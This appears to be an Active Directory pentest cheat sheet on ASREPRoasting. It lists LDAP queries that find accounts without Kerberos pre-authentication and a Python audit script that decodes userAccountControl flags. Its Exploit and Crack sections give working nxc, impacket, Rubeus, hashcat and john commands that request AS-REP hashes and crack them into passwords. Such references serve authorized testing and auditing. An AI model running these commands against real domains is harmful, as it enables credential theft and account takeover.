
ASREPRoast

Identify


NXC (remotely)

nxc ldap <IP> -u '' -p '' --query '(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))' ""
Locally: ADSearch (GitHub)
ADSearch.exe --search "(&(objectCategory=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" --attributes cn,samAccountName,userAccountControl
Locally: lolbin
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))" -attr distinguishedName userAccountControl
Locally: PowerView
Get-DomainUser -UACFilter DONT_REQ_PREAUTH | Select-Object samaccountname,useraccountcontrol
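All of the Identify queries above rely on the same thing: the LDAP bitwise-AND matching rule (OID 1.2.840.113556.1.4.803) applied to the userAccountControl attribute, with 4194304 (0x400000) being the DONT_REQ_PREAUTH bit. The script below is an added example, not part of the original cheat sheet, that decodes userAccountControl values into flag names and emulates that filter over a handful of constructed directory entries, which is the same check a defender runs when auditing which accounts still have Kerberos pre-authentication disabled. The entries, account names and the reduced flag table are assumptions made for the example.

```python
# Added example (not from the original cheat sheet): decode userAccountControl (UAC)
# bits and emulate the LDAP_MATCHING_RULE_BIT_AND filter (OID 1.2.840.113556.1.4.803)
# used by the Identify commands, so you can see exactly which accounts
# "(userAccountControl:1.2.840.113556.1.4.803:=4194304)" returns.
# The directory entries below are constructed for the example, not real accounts.

# Subset of UAC flag values from Microsoft's ADS_USER_FLAG_ENUM documentation.
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x400000: "DONT_REQ_PREAUTH",
}

DONT_REQ_PREAUTH = 0x400000  # 4194304 decimal: the value used in the LDAP filter above
PASSWD_NOTREQD = 0x0020      # 32 decimal: an unrelated flag, easy to confuse with the one above
ACCOUNTDISABLE = 0x0002


def decode_uac(value):
    """Return the names of all known flags set in a userAccountControl value, low bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def bit_and_match(value, mask):
    """Emulate LDAP_MATCHING_RULE_BIT_AND: true only when every bit of mask is set in value."""
    return value & mask == mask


def find_preauth_disabled(entries, include_disabled=False):
    """Emulate the Identify query: users with DONT_REQ_PREAUTH set.

    Disabled accounts are skipped by default; the KDC will not issue them an
    AS-REP, so they are noise in an audit unless you explicitly want them.
    """
    hits = []
    for entry in entries:
        uac = entry["userAccountControl"]
        if not bit_and_match(uac, DONT_REQ_PREAUTH):
            continue
        if not include_disabled and uac & ACCOUNTDISABLE:
            continue
        hits.append(entry["sAMAccountName"])
    return hits


# Constructed sample entries (assumed names and flag combinations).
SAMPLE_ENTRIES = [
    {"sAMAccountName": "svc-test", "userAccountControl": 0x200 | 0x400000},           # pre-auth disabled
    {"sAMAccountName": "jdoe", "userAccountControl": 0x200},                            # ordinary user
    {"sAMAccountName": "legacy-app", "userAccountControl": 0x200 | 0x20},               # PASSWD_NOTREQD only
    {"sAMAccountName": "old-svc", "userAccountControl": 0x200 | 0x400000 | 0x2},        # pre-auth disabled but account disabled
]

if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print(f'{entry["sAMAccountName"]:12} {decode_uac(entry["userAccountControl"])}')
    print("pre-auth disabled (enabled accounts):", find_preauth_disabled(SAMPLE_ENTRIES))
    print("pre-auth disabled (all accounts):    ", find_preauth_disabled(SAMPLE_ENTRIES, include_disabled=True))
```

The legacy-app entry is included on purpose: a filter written against 32 (PASSWD_NOTREQD) instead of 4194304 would match it and miss svc-test, which is why the decimal value in the matching-rule filter has to be checked against the flag table rather than copied from another cheat sheet.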

Exploit


Request the AS-REP remotely:

nxc ldap <IP> -u '<USER>' -p '' --asreproast output.txt
impacket-GetNPUsers domain.local/svc-test -no-pass
Locally:
Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt /user:svc-test /nowrap
Get-ASREPHash -Username svc-test -Verbose

Crack ticket

hashcat -m 18200 --force -a 0 hashes.txt <wordlist>
john --wordlist=<wordlist> hashes.txt